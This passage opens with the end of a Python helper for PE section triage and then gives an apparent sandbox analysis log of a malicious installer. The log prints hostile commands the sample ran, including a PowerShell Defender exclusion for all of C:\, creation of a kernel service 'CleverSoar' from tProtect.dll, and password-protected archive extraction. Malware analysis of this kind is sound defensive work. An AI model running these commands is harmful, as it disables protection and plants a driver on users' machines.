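    coff = struct.pack("<HHIIIHH", 0x14C, len(names), 0, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
        for i, n in enumerate(names))
    return dos + b"PE\0\0" + coff + opt + table


if __name__ == "__main__":
    # On a real sample: triage_sections(open("update.vac", "rb").read())
    print(triage_sections(build_test_pe([b".text", b".rdata", b".j)q"])))
```

Packed or hand-edited binaries routinely carry section names like .j)q, so treat the name check as a triage hint to be read together with the section count, entropy and the other static rows, not as a verdict on its own.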
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002D7E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F4EA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1794126992.0000000000D59000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal80.evad.winEXE@126/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA14B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, | 6_2_6CA14B80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00189313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, | 9_2_00189313
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00193D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 9_2_00193D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 9_2_00189252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, | 9_2_00189252
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA14050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW, | 6_2_6CA14050
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | File created: C:\Program Files (x86)\Windows NT\is-CS4GB.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4604:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6168:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4408:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4428:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1516:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6024:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3868:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6044:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5260:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | File created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$20424,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043C,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Section loaded: appresolver.dll
